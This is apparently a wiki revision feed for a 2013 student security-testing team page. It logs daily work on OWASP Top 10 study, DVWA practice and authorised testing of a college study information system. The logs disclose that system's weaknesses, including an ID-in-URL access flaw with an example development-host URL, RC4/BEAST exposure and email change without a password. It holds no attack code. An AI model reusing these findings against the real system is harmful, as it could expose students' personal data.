*Tomas Lepistö, Vaasa University of Applied Sciences&lt;br /&gt;
*Mika Salmela, Vaasa University of Applied Sciences&lt;br /&gt;
*Kęstutis Tautvydas, Vilnius University of Applied Sciences&lt;br /&gt;
*Jurij Lukjančikov, Vilnius University of Applied Sciences&lt;br /&gt;
&lt;br /&gt;
==Goal==&lt;br /&gt;
*OWASP top 10&lt;br /&gt;
*HACK DVWA&lt;br /&gt;
*BackTrack, SamuraiCD (Last year experience)&lt;br /&gt;
*Scanning and testing tools  - Qualys SSL Labs&lt;br /&gt;
*Acunetix Web Vulnerability Scanner v.8&lt;br /&gt;
*SubGraph Vega&lt;br /&gt;
*BEAST attack&lt;br /&gt;
*RC4&lt;br /&gt;
&lt;br /&gt;
==Activity==&lt;br /&gt;
===Monday - 25.03.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Lectures&lt;br /&gt;
* Sumorobot programming&lt;br /&gt;
* Dinner @ St Patricks&lt;br /&gt;
&lt;br /&gt;
===Tuesday - 26.03.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Documentation!&lt;br /&gt;
A1 Injection - &amp;lt;b&amp;gt; Sandra &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A2 Broken Authentication and Session Management (was formerly A3) - &amp;lt;b&amp;gt; Kestutis &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A3 Cross-Site Scripting (XSS) (was formerly A2) - &amp;lt;b&amp;gt; Kestutis &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A4 Insecure Direct Object References - &amp;lt;b&amp;gt; Markus &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A5 Security Misconfiguration (was formerly A6)- &amp;lt;b&amp;gt; Tomas &amp;lt;/b&amp;gt; &lt;br /&gt;
&lt;br /&gt;
A6 Sensitive Data Exposure (merged from former A7 Insecure Cryptographic Storage and former A9 Insufficient Transport Layer Protection) - &amp;lt;b&amp;gt; Mika &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A7 Missing Function Level Access Control (renamed/broadened from former A8 Failure to Restrict URL Access) - &amp;lt;b&amp;gt; Sten &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A8 Cross-Site Request Forgery (CSRF) (was formerly A5) - &amp;lt;b&amp;gt; Matis &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A9 Using Known Vulnerable Components (new but was part of former A6 – Security Misconfiguration) - &amp;lt;b&amp;gt; Jurij &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A10 Unvalidated Redirects and Forwards - &amp;lt;b&amp;gt; Sten &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* Still need to get everyone a VM with DVWA running&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Copy Paste documentation tasks to Wiki :)&lt;br /&gt;
* Divide OWASP tasks&lt;br /&gt;
&lt;br /&gt;
===Wednesday - 27.03.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Meeting with clients. It was very open-minded meeting. We got to know more about requirements.&lt;br /&gt;
* Analysing the user needs. We discussed face to face with our client and mentor (Margus Ernits) what needs to be done in order to perform security testing. Also, we found some tools from the Internet, which we can use for testing purposes.&lt;br /&gt;
* We divided roles and shared our areas of competences. Also, we agreed that one should not be doing always the same thing, so we can share our work with eachother.&lt;br /&gt;
* Estonian ICT Presentation and Wireshark practice. Wireshark was more-less known for everyone in our team. Despite that fact, we all found something enjoyable and new from Antti&#039;s presentation and Wireshark.&lt;br /&gt;
* Estonian members made Study Information System presentation to Finnish and Lithuanians. We talked about some potential vulnerabilities (such as VÕTA declaration, file upload, sending messages, voting system)&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* As none of us have done security testing before, we have a lot to learn before we can actually do something. But I think with such a team as we are, it&#039;s nothing.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Estonian members are going to study last year&#039;s report and going to make a short overview to other members about it.&lt;br /&gt;
* We are going to study OWASP Top 10 vulnerabilities and everyone of us is going to make a short presentation to others about what they have learned.&lt;br /&gt;
* We are going to ask in demo (development) environment if they can open a new survey for us, new declaration period; Also we need teacher and demo accounts, in order to test teacher&#039;s side as well, because teachers have a little more access than students (grades, information about student etc).&lt;br /&gt;
* In demo environment we are going to test new functions (what haven&#039;t been included in main environment, yet) - as there&#039;s some new functionality.&lt;br /&gt;
&lt;br /&gt;
===Thursday - 28.03.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* OWASP TOP 10 presentations: Everybody presented on their subjects + discussion ([[#Materials_.28slides_etc.29|slides]])&lt;br /&gt;
* Discussed the schedule and to-do list for next days&lt;br /&gt;
* Discussed some potential vulnerabilities of SIS&lt;br /&gt;
* Made shared Googledoc to document the testing and to exchange information. Also we made Skype group in order to share files effectively and fast.&lt;br /&gt;
* Prepared software for testing (Backtrack, Kali)&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* There is a lot of information, we need to focus on something and just start. There is no such thing as start-line (&amp;quot;Start here and go this way&amp;quot;), we will just need to start and see what we will find. &lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Find attack examples for the vulnerabilities&lt;br /&gt;
* Try them out on DVWA&lt;br /&gt;
* Get familiar with Tamper Data, Kali and Backtrack&lt;br /&gt;
* Familiarise ourselves with XSS, Injection, CSRF before testing SIS&lt;br /&gt;
* See how to get authentication info from POST and GET&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Security threat of a day&#039;&#039;&#039;&lt;br /&gt;
* There are three environments of SIS. Live, demo and developer. We found out that developer environment is accesible with our live users and passwords. What&#039;s more -&amp;gt; developer environment has LIVE data!!! Like! Does that ring any bell to you? NEVER, we mean like NEVER use live data (data, grades, schedule, students, personal ID-s etc) in demo/developer environment!&lt;br /&gt;
&lt;br /&gt;
===Friday - 29.03.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Learned how to perform attacks. We learned different attack methods and tried them out.&lt;br /&gt;
* Learned how to use different automated tools. Automated tools are not very efficient to SIS, but still - there might pop up something interesting from the results. Results are saved for later analysis.&lt;br /&gt;
* Talked about last year&#039;s experience. Tried if most of the security holes are patched or not.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* We need student access to developer environment&lt;br /&gt;
* We need new survey and declaration period opened (we asked Margus, he promised to give our request to someone who can make it)&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Analysis of the results needs to be done&lt;br /&gt;
* Learn a little bit more about attacks&lt;br /&gt;
* Create some attacks&lt;br /&gt;
* Start to test simpler attacks to SIS&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Security threats of the day:&#039;&#039;&#039;&lt;br /&gt;
* One can see other student&#039;s exam plan just by chaning student_id value in the URL (you don&#039;t need to be logged in). You cannot see his/her name directly, but according to security holes now: See the schedule, just change ID - you get the name. Or if you are logged in, then you can go to &amp;quot;My data&amp;quot; and just change ID from the URL again.&lt;br /&gt;
&#039;&#039;For example: https://itcollege.dev.ois.ee/en/schedule/agenda?student_id=2322&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
===Saturday - 30.03.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Visiting Tallinn TV Tower&lt;br /&gt;
* Visitinig The Seaplane Harbour&lt;br /&gt;
&lt;br /&gt;
===Sunday - 31.03.13===&lt;br /&gt;
&#039;&#039;&#039;Free day&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
===Monday - 01.04.13===&lt;br /&gt;
&#039;&#039;&#039;NB! April fools&#039; day!&#039;&#039;&#039; Beware!&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* We analyzed student information fields in &amp;quot;My data&amp;quot; section&lt;br /&gt;
* We test different sections and tried to change user IDs - luckily these are safe now.&lt;br /&gt;
* Tried to use HTTP for different areas in SIS. Luckily, everything is forced to HTTPS.&lt;br /&gt;
* Study materials testing. If study materials are available to everyone (public), then it is possible to download them from HTTP and/or HTTPS!&lt;br /&gt;
* Tried reflected XSS, most SIS areas escape &amp;quot;bad characters&amp;quot; out from input boxes.&lt;br /&gt;
* As the SIS allows academicians (lecturers) to change their picture, we tried to insert some malicious code into picture. Scenario was that when someone opens the picture, some bad things will happen. This did not work in SIS. Students are not allowed to change their picture due to security reasons &#039;&#039;(for example: other person taking exams claiming he/she is someone he/she is not)&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* Still no new declaration etc opened for us. Maybe tomorrow?&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* We strongly hope that there will be new declaration period, survey, scolarship application and VÕTA opened for us for tomorrow morning, because we could test them as well and we don&#039;t have much time left.&lt;br /&gt;
* Go deeper with different attacks and methods.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Security threat&#039;s of the day:&#039;&#039;&#039;&lt;br /&gt;
* SIS (Study Information System) is vulnerable to BEAST attack, because it uses RC4 encryption algorithm in SSL. We as a test-team are not capable to perform this kind of attack, thus we cannot test how far can we go, but this is a threat to whole system. BEAST attack can sniff authorized user&#039;s cookies and then grant access to attacker.&lt;br /&gt;
* There&#039;s no character limit for input fields (search, names). This can lead to DOS-attack because attacker can send multiple requests with long URLs and then server freezes.&lt;br /&gt;
* Calendar: there&#039;s no limit or check if user have just typed numbers. Error is rendered back to user, but it is escaped.&lt;br /&gt;
* There are some developer&#039;s notes left in different SIS parts (not only in developer environment).&lt;br /&gt;
&lt;br /&gt;
===Tuesday - 02.04.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Visiting Skype office.&lt;br /&gt;
* Learning the principles of good presentation to put into practice tomorrow and on Thursday.&lt;br /&gt;
* SIS is using a field called &amp;quot;security_key_sis_global&amp;quot;. This form value does not change and is based on user data. We have found out that this does not change even on change of password, so that means, this has to be calculated from person&#039;s name and/or username and/or personal ID code and/or user_id value. We have assumption that this is a SHA1 hash, as it is 40 characters long. Maybe salted, maybe not? Anyway, this could be a threat to SIS in long term perspective.&lt;br /&gt;
* Studied the OWASP ASVS (Application Security Verification Standard) with SIS in mind. Marked the requirements we can not check for (because we do not have the source code etc), the requirements we believe are met and those that need further testing.&lt;br /&gt;
*Got the chance to insert a new VÕTA (APEL) request that also allows for uploading files. This is interesting because it might be possible to upload a file containing malicious code.&lt;br /&gt;
*The SIS does not ask for password when changing the personal e-mail address. This is a risk, because this is the mail address SIS sends a password reset link to if the user clicks on &amp;quot;Forgot my password&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* Really would have liked to have more time to test.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Prepare and rehearse the presentation&lt;br /&gt;
* Look further into the e-mail modification issue.&lt;br /&gt;
* Finalise ASVS review&lt;br /&gt;
&lt;br /&gt;
===Wednesday - 03.04.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Studied and analysed ASVS. Went through requirements and aspects about web application security, analysed what applies to SIS and what not.&lt;br /&gt;
* We learned and practiced public presentation. Discussed structure and divided roles. Rehearsed presentation to &amp;quot;audience&amp;quot;.&lt;br /&gt;
* SIS testing (security token), javascript upload, tried to find XSS vulnerabilities in APEL (VÕTA) application and file upload areas etc.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* Lack of time. Doing presentation and rehersal took so much time which could be used for testing SIS. Also, testing SIS took so much time, which again could be have been used for rehearsal.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* We want to review and rehearse our final presentation.&lt;br /&gt;
* Update our documentation in Wiki.&lt;br /&gt;
* Upload and link presentations to persons and fill gaps in documentation.&lt;br /&gt;
&lt;br /&gt;
===Thursday - 04.04.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Dress rehearsal. Updated presentation according to feedback and capabilities.&lt;br /&gt;
* Updated documentation to Wiki and uploaded missing presentations.&lt;br /&gt;
* Personal input section filling in Wiki.&lt;br /&gt;
* Went bowling. :)&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* Sometimes one minute feels like it is not a minute. :)&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Final documentation (link to Google docs).&lt;br /&gt;
* IP feedback&lt;br /&gt;
* Summarisation&lt;br /&gt;
&lt;br /&gt;
===Friday - 05.04.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Saturday - 06.04.13===&lt;br /&gt;
&#039;&#039;&#039;Departure! Bye bye!&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Materials (slides etc)==&lt;br /&gt;
* &#039;&#039;&#039;Slides about OWASP (Open Web Application Security Project) TOP 10 what we performed to eachother&#039;&#039;&#039;&lt;br /&gt;
** TOP 10 list [[Media:OWASP_Top_10_-_2013_-_RC1.pdf‎]]&lt;br /&gt;
** A1 Injection [[Media:2013_security_a1.pdf]] (Made by: Sandra)&lt;br /&gt;
** A2 Broken Authentication and Session Management [[Media:2013_security_a2.pdf]] (Made by: Kęstutis)&lt;br /&gt;
** A3 Cross-Site Scripting (XSS) [[Media:2013_security_a3.pdf]] (Made by: Kęstutis)&lt;br /&gt;
** A4 Insecure Direct Object References [[Media:2013_security_a4.pdf]] (Made by: Markus)&lt;br /&gt;
** A5 Security Misconfiguration [[Media:2013_security_a5.pdf]] (Made by: Tomas)&lt;br /&gt;
** A6 Sensitive Data Exposure [[Media:2013_security_a6.pdf]] (Made by: Mika)&lt;br /&gt;
** A7 Missing Function Level Access Control [[Media:2013_security_a7.pdf]] (Made by: Sten)&lt;br /&gt;
** A8 Cross-Site Request Forgery (CSRF) - was covered in A1&lt;br /&gt;
** A9 Using Known Vulnerable Components [[Media:2013_security_a9.pdf]] (Made by: Jurij)&lt;br /&gt;
** A10 Unvalidated Redirects and Forwards [[Media:2013_security_a10.pdf]] (Made by: Sten)&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;Day summarisation:&#039;&#039;&#039;&lt;br /&gt;
** Slides presented on the 28th of March day summarization. [[Media:2013 security presentation 28 03.pdf]]&lt;br /&gt;
** Slides presented on the 01st of April day summarization. [[Media:2013_security_presentation_01_04.pdf]]&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;Final presentation of project on the 4 April 2013 [[Media:2013_security_final_presentation.pdf]] (Made by whole team, structure by Sandra and Jurij)&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;Security teamwork (whiteboard):&#039;&#039;&#039;&lt;br /&gt;
** Whiteboard 27.03 [[Media:Security team 2013-03-27.jpg]]&lt;br /&gt;
** Whiteboard 28.03 [[Media:security_2013_picture_2803.JPG]]&lt;br /&gt;
** Whiteboard 29.03 [[Media:security_2013_picture_2903.JPG]]&lt;br /&gt;
** Whiteboard 01.04 [[Media:security_2013_picture1.JPG]]&lt;br /&gt;
** Whiteboard 02.04 [[Media:security_2013_picture_0204.JPG]]&lt;br /&gt;
** Whiteboard 03.04 [[Media:2013_security_presentation_structure.jpg]] (Discussion about final presentation)&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;Virtual Machines (VM VirtualBox .ova files):&lt;br /&gt;
** [http://elab.itcollege.ee:8000/security_team.ova Virtual Machine with Apache, MySQL, DVWA]&lt;br /&gt;
** [http://elab.itcollege.ee:8000/BT5R2.ova Virtual Machine with Backtrack]&lt;br /&gt;
** [http://elab.itcollege.ee:8000/kali-64bit.ova Virtual Machine with Kali Linux]&lt;br /&gt;
&lt;br /&gt;
==Results==&lt;br /&gt;
Summary of what we did and solution what we developed&lt;br /&gt;
&lt;br /&gt;
===Personal input===&lt;br /&gt;
====Sten Aus====&lt;br /&gt;
We divided our roles already on the first day (which was 25 March). I was selected as a group leader (project manager), but we decided also that this is a democracy not a tyranny. :) I was happy that everybody showed up their good sides and told what they are good at.&lt;br /&gt;
&lt;br /&gt;
For me, some of the tools, which we have used, were already familiar (Apache, Linux, DVWA), because I have learned them before in school (Margus’ lectures) or at home by myself. But I tried to help others (in the practice and in our group) if there was any questions.&lt;br /&gt;
&lt;br /&gt;
The biggest improvement for me was the documentation part. I have documented my work before as well, but in such a big group as we had, it was first time experience for me. I got to know different ways how to do this, also now I value “same day feedback” more, because it is good to know what went well/bad on the same day, not the last one. :)&lt;br /&gt;
&lt;br /&gt;
As we all were technical background-persons, cooperation was very smooth and teamwork was very enjoyable. I learned a lot about teamwork and security threats in web and how to avoid them. I have already taken different security measures into account in many web applications what I am using (or administering).&lt;br /&gt;
&lt;br /&gt;
====Matis Palm====&lt;br /&gt;
Helped teaching Apache &amp;amp; Linux &amp;amp; DVWA to other participants  (Due to having some experience already from before). Helping with sumorobot programming (Being from the robotics club). I helped to push the team in some direction at start, because no-one had previous experience and I was here last year on the Intensive Programme with the previous Security team. I learned alot about how to use and search information for security testing (XSS, CSRF and so on). I learned about ASVS and OWASP and a few tools used for testing (e.g. TamperData, InjectMe XSS and CSRF and so on)&lt;br /&gt;
&lt;br /&gt;
====Sandra Suviste====&lt;br /&gt;
&#039;&#039;&#039;What I did:&#039;&#039;&#039; researched and presented vulnerability No 1 from the OWASP Top 10 list - Injection. Practised attacks on the DVWA. Went through the OWASP ASVS document for possible shortcomings of the SIS. Tested the SIS for vulnerabilities, mostly SQL and XSS injections - both in web forms and in the URL. Documented my own and others&#039; work.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;What I learned:&#039;&#039;&#039; a lot about web application vulnerabilities  - from my own research &amp;amp; practice and from others&#039; presentations and teachers&#039; lectures. Became more experienced in working in a multinational group with English as the working language. I learned how to document my work in order to keep track of the work of the team. I also learned what are the issues connected to the  preparing of and giving a presentation with several (&amp;gt;3) presenters.&lt;br /&gt;
&lt;br /&gt;
====Markus Rintamäki====&lt;br /&gt;
My knowledge in hacking a real system before this course was close to a zero. I had to learn the basic attack methods and so I did. First of all we all made a presentations about the OWASP TOP 10. Mine was about Insecure Direct Object References. Margus learned us to do the basic attack methods in DVWA: SQL injection, XSS and CSRF. After that I had to get familiar with the SIS. I tried all the basics on SIS, changing user ids, SQL injection and XSS.&lt;br /&gt;
&lt;br /&gt;
I tried this one thing all by myself that I found searching in google. I tried to upload a profile picture that had malicious .php code inside of it as a lecturer as they have right to do that. Unfortunately that didn&#039;t work and the php code was not rendered. I also used a tool in Backtrack to decrypt the token that we found. This was also unsuccessful.&lt;br /&gt;
&lt;br /&gt;
I also learned to program sumorobots, more about Linux and Wireshark. We made the presentation structure together. And also of course I learned to speak english more fluently. :)&lt;br /&gt;
&lt;br /&gt;
====Tomas Lepistö====&lt;br /&gt;
&#039;&#039;&#039;What I did?&#039;&#039;&#039;&lt;br /&gt;
* Tried to find out possible security holes from OIS site.&lt;br /&gt;
* Tested different attacking methods with DVWA&lt;br /&gt;
* SQL-injection tests into various places on OIS site.&lt;br /&gt;
* Tested some XSS methods&lt;br /&gt;
* Made presentation about Misconfigured Configuration.&lt;br /&gt;
* Prepared our presentation with other group members&lt;br /&gt;
* Spoke in daily summary&lt;br /&gt;
* Studied a lot of information to know what is hacking about?&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;What i learned?&#039;&#039;&#039;&lt;br /&gt;
* I learned how to use SQL-injection, XSS, Brute force, CSRF&lt;br /&gt;
* I learned also how to use Kali,Backtrack,Temper data, DVWA&lt;br /&gt;
* Working in international group&lt;br /&gt;
* How important documentation is&lt;br /&gt;
* Found out how important it is to make web-application secure&lt;br /&gt;
&lt;br /&gt;
====Mika Salmela====&lt;br /&gt;
&#039;&#039;&#039;What I did?&#039;&#039;&#039;&lt;br /&gt;
* I studied hacking methods&lt;br /&gt;
* Tried some hacking methods with DVWA&lt;br /&gt;
* Iscanned website, try to find if there is some security risks&lt;br /&gt;
* Tried some SQL and XSS injections&lt;br /&gt;
* Made presentation of Sensitive Data Exposure&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;What I learned?&#039;&#039;&#039;&lt;br /&gt;
* More than basics of how to hack?&lt;br /&gt;
* The most common hacking methods and how to use them.&lt;br /&gt;
* How to do SQL and XSS injections&lt;br /&gt;
* Basics of hacking tools&lt;br /&gt;
* How to find security risks&lt;br /&gt;
* How to work in international team.&lt;br /&gt;
* Learned much about what these are: DVWA, OWASP and ASVS.&lt;br /&gt;
&lt;br /&gt;
====Kęstutis Tautvydas====&lt;br /&gt;
&#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
* Searched for security holes in OIS student information site.&lt;br /&gt;
* Used DVWA tool to test sql injections and xss scripting.&lt;br /&gt;
* Tried some sql injections and xss scripting on OIS page&lt;br /&gt;
* Made presentations about broken authentication and session management and cross-site scripting and introduced them to my team mates&lt;br /&gt;
* Prepared some slides for the main presentation&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;What have I learned:&#039;&#039;&#039;&lt;br /&gt;
* Theory about OWASP TOP 10 threats&lt;br /&gt;
* How to do sql injections&lt;br /&gt;
* How to use Firefox tamperdata tool&lt;br /&gt;
* How to do cross-site scripting&lt;br /&gt;
* Completely understood what is use case and how to draw them&lt;br /&gt;
* How to monitor activities with Wireshark&lt;br /&gt;
* How to do a scan of web site vulnerability using Acunetix Web Vulnerability Scanner 8&lt;br /&gt;
&lt;br /&gt;
====Jurij Lukjančikov====&lt;br /&gt;
I have learned about security breaches on the web. Have tried different parts of web for vulnerabilities and injection. Together with team learned how to make injection and XSS attacks using Linux. Through Linux was unfamiliar for me. Together with team we divided roles and found out most important points for presentation. Last but not least coworking with team and reaching same goal was one important task. I and Sandra were responsible for the final presentation structure.&lt;br /&gt;
&lt;br /&gt;
===Final documentation===&lt;br /&gt;
====Analysis====&lt;br /&gt;
&lt;br /&gt;
====Solution====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==IP Feed-back==&lt;br /&gt;
===Feedback from Sten Aus===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Feedback from Matis Palm===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Feedback from Sandra Suviste===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Feedback from Markus Rintamäki===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Feedback from Tomas Lepistö===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Feedback from Mika Salmela===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Feedback from Kęstutis Tautvydas===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Feedback from Jurij Lukjančikov===&lt;/div&gt;</summary>
		<author><name>Saus</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Security&amp;diff=62322</id>
		<title>Security</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Security&amp;diff=62322"/>
		<updated>2013-04-04T14:37:53Z</updated>

		<summary type="html">&lt;p&gt;Saus: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Team page for [[Deploying IT Infrastructure Solutions]].&lt;br /&gt;
&lt;br /&gt;
==Team Members==&lt;br /&gt;
*Sten Aus, Estonian Information Technology College&lt;br /&gt;
*Matis Palm, Estonian Information Technology College&lt;br /&gt;
*Sandra Suviste, Estonian Information Technology College&lt;br /&gt;
*Markus Rintamäki, Vaasa University of Applied Sciences&lt;br /&gt;
*Tomas Lepistö, Vaasa University of Applied Sciences&lt;br /&gt;
*Mika Salmela, Vaasa University of Applied Sciences&lt;br /&gt;
*Kęstutis Tautvydas, Vilnius University of Applied Sciences&lt;br /&gt;
*Jurij Lukjančikov, Vilnius University of Applied Sciences&lt;br /&gt;
&lt;br /&gt;
==Goal==&lt;br /&gt;
*OWASP top 10&lt;br /&gt;
*HACK DVWA&lt;br /&gt;
*BackTrack, SamuraiCD (Last year experience)&lt;br /&gt;
*Scanning and testing tools  - Qualys SSL Labs&lt;br /&gt;
*Acunetix Web Vulnerability Scanner v.8&lt;br /&gt;
*SubGraph Vega&lt;br /&gt;
*BEAST attack&lt;br /&gt;
*RC4&lt;br /&gt;
&lt;br /&gt;
==Activity==&lt;br /&gt;
===Monday - 25.03.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Lectures&lt;br /&gt;
* Sumorobot programming&lt;br /&gt;
* Dinner @ St Patricks&lt;br /&gt;
&lt;br /&gt;
===Tuesday - 26.03.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Documentation!&lt;br /&gt;
A1 Injection - &amp;lt;b&amp;gt; Sandra &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A2 Broken Authentication and Session Management (was formerly A3) - &amp;lt;b&amp;gt; Kestutis &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A3 Cross-Site Scripting (XSS) (was formerly A2) - &amp;lt;b&amp;gt; Kestutis &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A4 Insecure Direct Object References - &amp;lt;b&amp;gt; Markus &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A5 Security Misconfiguration (was formerly A6)- &amp;lt;b&amp;gt; Tomas &amp;lt;/b&amp;gt; &lt;br /&gt;
&lt;br /&gt;
A6 Sensitive Data Exposure (merged from former A7 Insecure Cryptographic Storage and former A9 Insufficient Transport Layer Protection) - &amp;lt;b&amp;gt; Mika &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A7 Missing Function Level Access Control (renamed/broadened from former A8 Failure to Restrict URL Access) - &amp;lt;b&amp;gt; Sten &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A8 Cross-Site Request Forgery (CSRF) (was formerly A5) - &amp;lt;b&amp;gt; Matis &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A9 Using Known Vulnerable Components (new but was part of former A6 – Security Misconfiguration) - &amp;lt;b&amp;gt; Jurij &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A10 Unvalidated Redirects and Forwards - &amp;lt;b&amp;gt; Sten &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* Still need to get everyone a VM with DVWA running&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Copy Paste documentation tasks to Wiki :)&lt;br /&gt;
* Divide OWASP tasks&lt;br /&gt;
&lt;br /&gt;
===Wednesday - 27.03.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Meeting with clients. It was very open-minded meeting. We got to know more about requirements.&lt;br /&gt;
* Analysing the user needs. We discussed face to face with our client and mentor (Margus Ernits) what needs to be done in order to perform security testing. Also, we found some tools from the Internet, which we can use for testing purposes.&lt;br /&gt;
* We divided roles and shared our areas of competences. Also, we agreed that one should not be doing always the same thing, so we can share our work with eachother.&lt;br /&gt;
* Estonian ICT Presentation and Wireshark practice. Wireshark was more-less known for everyone in our team. Despite that fact, we all found something enjoyable and new from Antti&#039;s presentation and Wireshark.&lt;br /&gt;
* Estonian members made Study Information System presentation to Finnish and Lithuanians. We talked about some potential vulnerabilities (such as VÕTA declaration, file upload, sending messages, voting system)&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* As none of us have done security testing before, we have a lot to learn before we can actually do something. But I think with such a team as we are, it&#039;s nothing.&lt;br /&gt;
&lt;br /&gt;
